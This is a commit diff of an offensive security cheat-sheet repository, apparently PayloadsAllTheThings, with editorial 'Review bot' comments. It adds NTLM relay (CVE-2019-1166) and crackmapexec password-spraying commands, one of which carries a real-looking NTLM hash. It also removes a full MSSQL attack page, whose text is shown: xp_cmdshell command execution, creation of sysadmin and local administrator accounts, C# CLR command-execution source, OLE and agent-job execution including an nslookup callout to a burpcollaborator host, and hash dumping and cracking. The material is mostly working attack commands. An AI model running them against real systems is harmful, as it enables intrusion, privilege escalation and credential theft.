Compare commits
8 Commits
7d71c5c4fa
...
a8b40ed804
Author | SHA1 | Date
---|---|---
NoPurposeInLife | a8b40ed804 |
Swissky | 8c4d5ad3ae |
Swissky | 56c56120b4 |
Swissky | 20b912b3a0 |
Swissky | 255aaec399 |
Swissky | 978e8b336b |
Swissky | bf3c6c4875 |
NoPurposeInLife | 2143a1a52e |
@ -124,7 +124,7 @@ impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
```


## Drop the MIC
## Drop the MIC - CVE-2019-1040

> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP

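Review bot: renaming `## Drop the MIC` to `## Drop the MIC - CVE-2019-1040` changes the heading's generated anchor (`#drop-the-mic` becomes `#drop-the-mic---cve-2019-1040`), and this hunk touches only the heading line, so any Summary entry or cross-page link that still points at the old anchor needs the same update. The CVE suffix itself is consistent with the other vulnerability headings on the page (`## Ghost Potato - CVE-2019-1384`).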
@ -157,6 +157,20 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
```


## Drop the MIC 2 - CVE-2019-1166

> A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.

* Unset the signing flags in the `NTLM_NEGOTIATE` message (`NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`)
* Inject a rogue msvAvFlag field in the `NTLM_CHALLENGE` message with a value of zeros
* Remove the MIC from the `NTLM_AUTHENTICATE` message
* Unset the following flags in the `NTLM_AUTHENTICATE` message: `NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`, `NEGOTIATE_KEY_EXCHANGE`, `NEGOTIATE_VERSION`.

```ps1
ntlmrelayx.py -t ldap://dc.domain.com --escalate-user 'youruser$' -smb2support --remove-mic --delegate-access
```


## Ghost Potato - CVE-2019-1384

Requirements:

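Review bot: the block quote describing CVE-2019-1166 carries no source, and the References list updated in this same change has entries for CVE-2019-1040 but none for CVE-2019-1166; add the advisory or write-up the quote was taken from. Two smaller points: the fence is tagged `ps1` but `ntlmrelayx.py -t ldap://dc.domain.com --escalate-user 'youruser$' -smb2support --remove-mic --delegate-access` is an impacket command line, so `bash` would be the accurate tag; and the bullet list describes the message modifications while nothing says that `--remove-mic` is the option that applies them, so a one-line lead-in between the list and the command would make the connection for the reader.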
@ -288,9 +302,10 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c

## References

* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema - June 13, 2019](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
* [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/)
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers - 07/27/2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)

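Review bot: the reordered list drops the `Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019` entry (https://blog.preempt.com/drop-the-mic) even though the page keeps its Drop the MIC section; if the link is dead, swap in an archived copy or the vendor's current URL rather than losing the primary write-up. Style: the entries now carry `Month D, YYYY` dates except `Relay Your Heart Away ... - Nick Powers - 07/27/2024`, which should use the same format. The alphabetical ordering and the dates added to the Dirk-jan Mollema and Adam Toscher entries are otherwise consistent with the rest of the list.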
@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```

## Spray passwords against everything
* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
```
> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com

echo "" >> users.txt
echo "Administrator" >> users.txt
echo "Guest" >> users.txt
echo "DefaultAccount" >> users.txt
echo "WDAGUtilityAccount" >> users.txt
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
```

## BadPwdCount attribute

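Review bot: `echo "" >> users.txt` seeds the user list with an empty username, so every crackmapexec run below tries a blank user first; drop that line. The two `./cme ssh` lines pass `-H hashes.txt`, but SSH does not authenticate with NTLM hashes, so they cannot succeed as written. The line `> Take Administrator Password from mimikatz and secretsdump.py ...` sits inside the code fence, where the `>` renders literally instead of as a note; move it above the fence. The fence has no language tag while the rest of the page tags its blocks (`ps1`); `bash` fits here. Finally, `/etc/proxychains_9052.conf` and the hash `077a55c458dc4002dfdc5321a7659526` look copied from a specific engagement; replace them with placeholders in the style of the `example.com` names already used.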
@ -1,724 +0,0 @@
# MSSQL Server

## Summary

- [MSSQL Server](#mssql-server)
- [Summary](#summary)
- [Tools](#tools)
- [Identify Instances and Databases](#identify-instances-and-databases)
- [Discover Local SQL Server Instances](#discover-local-sql-server-instances)
- [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances)
- [Discover Remote SQL Server Instances](#discover-remote-sql-server-instances)
- [Identify Encrypted databases](#identify-encrypted-databases)
- [Version Query](#version-query)
- [Identify Sensitive Information](#identify-sensitive-information)
- [Get Tables from a Specific Database](#get-tables-from-a-specific-database)
- [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column)
- [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
- [Dump common information from server to files](#dump-common-information-from-server-to-files)
- [Linked Database](#linked-database)
- [Find Trusted Link](#find-trusted-link)
- [Execute Query Through The Link](#execute-query-through-the-link)
- [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
- [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
- [Query Version of Linked Database](#query-version-of-linked-database)
- [Execute Procedure on Linked Database](#execute-procedure-on-linked-database)
- [Determine Names of Linked Databases](#determine-names-of-linked-databases)
- [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
- [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
- [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
- [Command Execution via xp\_cmdshell](#command-execution-via-xp_cmdshell)
- [Extended Stored Procedure](#extended-stored-procedure)
- [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
- [CLR Assemblies](#clr-assemblies)
- [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
- [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
- [OLE Automation](#ole-automation)
- [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
- [Agent Jobs](#agent-jobs)
- [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
- [List All Jobs](#list-all-jobs)
- [External Scripts](#external-scripts)
- [Python](#python)
- [R](#r)
- [Audit Checks](#audit-checks)
- [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities)
- [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
- [Manual SQL Server Queries](#manual-sql-server-queries)
- [Query Current User \& determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin)
- [Current Role](#current-role)
- [Current DB](#current-db)
- [List all tables](#list-all-tables)
- [List all databases](#list-all-databases)
- [All Logins on Server](#all-logins-on-server)
- [All Database Users for a Database](#all-database-users-for-a-database)
- [List All Sysadmins](#list-all-sysadmins)
- [List All Database Roles](#list-all-database-roles)
- [Effective Permissions from the Server](#effective-permissions-from-the-server)
- [Effective Permissions from the Database](#effective-permissions-from-the-database)
- [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
- [Exploiting Impersonation](#exploiting-impersonation)
- [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
- [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
- [References](#references)

## Tools

* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.


## Identify Instances and Databases

### Discover Local SQL Server Instances

```ps1
Get-SQLInstanceLocal
```


### Discover Domain SQL Server Instances

```ps1
Get-SQLInstanceDomain -Verbose
# Get Server Info for Found Instances
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get Database Names
Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults
```

### Discover Remote SQL Server Instances

```ps1
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
```

### Identify Encrypted databases
Note: These are automatically decrypted for admins


```ps1
Get-SQLDatabase -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Verbose | Where-Object {$_.is_encrypted -eq "True"}
```

### Version Query

```ps1
Get-SQLInstanceDomain | Get-Query "select @@version"
```

## Identify Sensitive Information

### Get Tables from a Specific Database

```ps1
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DBNameFromGet-SQLDatabaseCommand> -NoDefaults
Get Column Details from a Table
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DBName> -TableName <TableName>
```


### Gather 5 Entries from Each Column


```ps1
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<columnname1,columnname2,columnname3,columnname4,columnname5>" -Verbose -SampleSize 5
```

### Gather 5 Entries from a Specific Table


```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query 'select TOP 5 * from <DatabaseName>.dbo.<TableName>'
```


### Dump common information from server to files

```ps1
Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
```

## Linked Database

### Find Trusted Link


```sql
select * from master..sysservers
```


### Execute Query Through The Link

```sql
-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')

-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```

### Crawl Links for Instances in the Domain

A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results


```ps1
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
select * from master..sysservers
```


### Crawl Links for a Specific Instance

```ps1
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
```


### Query Version of Linked Database

```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
```


### Execute Procedure on Linked Database

```ps1
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
```


### Determine Names of Linked Databases

> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.

```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
```


### Determine All the Tables Names from a Selected Linked Database

> The result is TableName which feeds into following query


```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
```


### Gather the Top 5 Columns from a Selected Linked Table

> The results are ColumnName and ColumnValue which feed into following query


```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose
```

### Gather Entries from a Selected Linked Column


```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`"'select * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand> where <ColumnNameFromPreviousCommand>=<ColumnValueFromPreviousCommand>')" -Verbose
```


## Command Execution via xp_cmdshell

> xp_cmdshell disabled by default since SQL Server 2005

```ps1
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami

# Creates and adds local user backup to the local administrators group:
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add'" -Verbose
PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net localgroup administrators backup /add" -Verbose
```

* Manually execute the SQL query
```sql
EXEC xp_cmdshell "net user";
EXEC master..xp_cmdshell 'whoami'
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```
* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
* If the procedure was uninstalled
```sql
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
```


## Extended Stored Procedure

### Add the extended stored procedure and list extended stored procedures

```ps1
# Create evil DLL
Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test

# Load the DLL and call xp_test
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'"
Get-SQLQuery -UserName sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Query "EXEC xp_test"

# Listing existing
Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
```

* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp)
* Load the DLL
```sql
-- can also be loaded from UNC path or Webdav
sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll'
EXEC xp_calc
sp_dropextendedproc 'xp_calc'
```


## CLR Assemblies

Prerequisites:

* sysadmin privileges
* CREATE ASSEMBLY permission (or)
* ALTER ASSEMBLY permission (or)

The execution takes place with privileges of the **service account**.


### Execute commands using CLR assembly

```ps1
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop

# Execute command using CLR assembly
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose

# List all the stored procedures added using CLR
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
```


### Manually creating a CLR DLL and importing it

Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void cmd_exec (SqlString execCommand)
{
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();

// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));

// Mark the beginning of the result set.
SqlContext.Pipe.SendResultsStart(record);

// Set values for each column in the row
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

// Send the row back to the client.
SqlContext.Pipe.SendResultsRow(record);

// Mark the end of the result set.
SqlContext.Pipe.SendResultsEnd();

proc.WaitForExit();
proc.Close();
}
};
```

Then follow these instructions:

1. Enable `show advanced options` on the server
```sql
sp_configure 'show advanced options',1;
RECONFIGURE
GO
```
2. Enable CLR on the server
```sql
sp_configure 'clr enabled',1
RECONFIGURE
GO
```
3. Trust the assembly by adding its SHA512 hash
```sql
EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly';
```
4. Import the assembly
```sql
CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
```
5. Link the assembly to a stored procedure
```sql
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO
```
6. Execute and clean
```sql
cmd_exec "whoami"
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly
```

**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL

```sql
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE
GO
```


## OLE Automation

* :warning: Disabled by default
* The execution takes place with privileges of the **service account**.


### Execute commands using OLE automation procedures

```ps1
Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
```

```ps1
# Enable OLE Automation
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure

# Execute commands
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'
```


```powershell
# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py
python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll
python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll'
python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll'
SQL> enable_ole
SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
```


## Agent Jobs

* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.



### Execute commands through SQL Agent Job service

```ps1
Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell e <base64encodedscript>" -Verbose
Subsystem Options:
–Subsystem CmdExec
-SubSystem PowerShell
–Subsystem VBScript
–Subsystem Jscript
```

```sql
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';

-- delete
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
```


### List All Jobs

```ps1
SELECT job_id, [name] FROM msdb.dbo.sysjobs;
SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
```


## External Scripts

Requirements:

* Feature 'Advanced Analytics Extensions' must be installed
* Enable **external scripts**.

```sql
sp_configure 'external scripts enabled', 1;
RECONFIGURE;
```


### Python

```ps1
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose

EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))
```


### R

```ps1
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose

EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
```


## Audit Checks


### Find and exploit impersonation opportunities

* Impersonate as: `EXECUTE AS LOGIN = 'sa'`
* Impersonate `dbo` with DB_OWNER
```sql
SQL> select is_member('db_owner');
SQL> execute as user = 'dbo'
SQL> SELECT is_srvrolemember('sysadmin')
```

```ps1
Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

# impersonate sa account
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
```


## Find databases that have been configured as trustworthy

```sql
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose

SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
```

> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.

```ps1
Invoke-SQLAuditPrivXpDirtree
Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist
```


## Manual SQL Server Queries

### Query Current User & determine if the user is a sysadmin

```sql
select suser_sname()
Select system_user
select is_srvrolemember('sysadmin')
```


### Current Role

```sql
Select user
```


### Current DB

```sql
select db_name()
```


### List all tables

```sql
select table_name from information_schema.tables
```


### List all databases

```sql
select name from master..sysdatabases
```


### All Logins on Server

```sql
Select * from sys.server_principals where type_desc != 'SERVER_ROLE'
```


### All Database Users for a Database

```sql
Select * from sys.database_principals where type_desc != 'database_role';
```


### List All Sysadmins

```sql
SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
```


### List All Database Roles

```sql
SELECT DB1.name AS DatabaseRoleName,
isnull (DB2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM
RIGHT OUTER JOIN sys.database_principals AS DB1
ON DRM.role_principal_id = DB1.principal_id
LEFT OUTER JOIN sys.database_principals AS DB2
ON DRM.member_principal_id = DB2.principal_id
WHERE DB1.type = 'R'
ORDER BY DB1.name;
```


### Effective Permissions from the Server

```sql
select * from fn_my_permissions(null, 'server');
```


### Effective Permissions from the Database

```sql
SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE');
```


### Find SQL Server Logins Which can be Impersonated for the Current Database

```sql
select distinct b.name
from sys.server_permissions a
inner join sys.server_principals b
on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate'
```


### Exploiting Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'adminuser'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
```


### Exploiting Nested Impersonation

```sql
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'stduser'
SELECT SYSTEM_USER
EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER
```


### MSSQL Accounts and Hashes

```sql
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)

MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```

Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`

```ps1
131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
```


## References

* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
|
||||
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
|
||||
* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)
|
|
